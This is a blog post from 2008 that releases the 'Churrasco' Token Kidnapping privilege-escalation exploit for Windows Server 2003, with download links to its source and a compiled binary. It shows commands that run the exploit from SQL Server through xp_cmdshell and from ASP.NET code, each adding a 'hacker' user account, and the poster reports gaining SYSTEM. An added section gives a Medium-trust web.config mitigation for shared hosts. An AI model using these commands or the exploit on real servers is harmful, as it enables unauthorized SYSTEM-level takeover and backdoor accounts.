MS Windows 2003 Token Kidnapping Local Exploit PoC

    [October 9, 2008 12:40 | by !4p47hy ]
It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published, so I decided to release a PoC exploit for Win2k3 that allows to execute code under the SYSTEM account.

Basically, if you can run code under any service in Win2k3 then you can own Windows; this is because Windows service accounts can impersonate. Other processes (not services) that can impersonate are IIS 6 worker processes, so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recommend not allowing users to run this kind of code from ASP.

-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName = Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments = " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.

PS: I tested this successfully in a virtual machine; the environment was Windows 2003 SP1 with all patches. Under .NET, i.e. with User privileges, it could successfully execute system commands. Very powerful. Screenshots below:

Update: according to a friend's testing, privilege escalation also succeeds from an ASP webshell, meaning system commands can be executed even under Guest, but .NET support is required.
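The post's one piece of advice to shared hosts is to stop tenant ASP code from running this kind of thing. The following is an added example, not part of the original post or of the Churrasco PoC, showing how that is enforced on an IIS 6 / ASP.NET 2.0 server: the server-wide web.config pins every application to the Medium trust level and forbids per-site override. Medium trust does not grant the full-trust/unmanaged-code permissions that System.Diagnostics.Process demands, so the Process.Start() snippet above fails with a SecurityException instead of launching a child process under the worker-process token. The file path and the commented-out "weak" setting are assumptions for illustration.

```xml
<!-- Added example (not the original post's or the PoC's own configuration).
     Server-wide web.config for an IIS 6 / ASP.NET 2.0 shared-hosting box,
     assumed to live at
     %WINDIR%\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config.
     allowOverride="false" means a tenant's own web.config cannot raise the
     trust level back to Full. -->
<configuration>
  <location allowOverride="false">
    <system.web>
      <!-- Weak setting (the ASP.NET default): every site runs fully trusted
           and may spawn processes, call unmanaged code and load any assembly.
           Shown here only for comparison:
           <trust level="Full" originUrl="" />
      -->
      <!-- Hardened setting: partial trust for every tenant application.
           System.Diagnostics.Process, unmanaged calls and registry access
           are no longer available to page code. -->
      <trust level="Medium" originUrl="" />
    </system.web>
  </location>
</configuration>
```

Two caveats a practitioner would want: the CLR trust level only governs ASP.NET code, not classic ASP, which runs outside the CLR (the post's update reports that an ASP shell still worked as long as .NET was installed), so classic ASP on the same host needs its own restrictions; and Medium trust is a mitigation for the "run code from a web app" precondition, not a fix for the underlying token-impersonation issue, which still needs the vendor patch.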

[4 screenshots]

Code download:

Download (705 downloads)

Compiled exploit:

Download (810 downloads)
MK2
October 9, 2008 17:25
Nice. Post a compiled binary please....
!4p47hy replied on October 11, 2008 13:19
Already uploaded.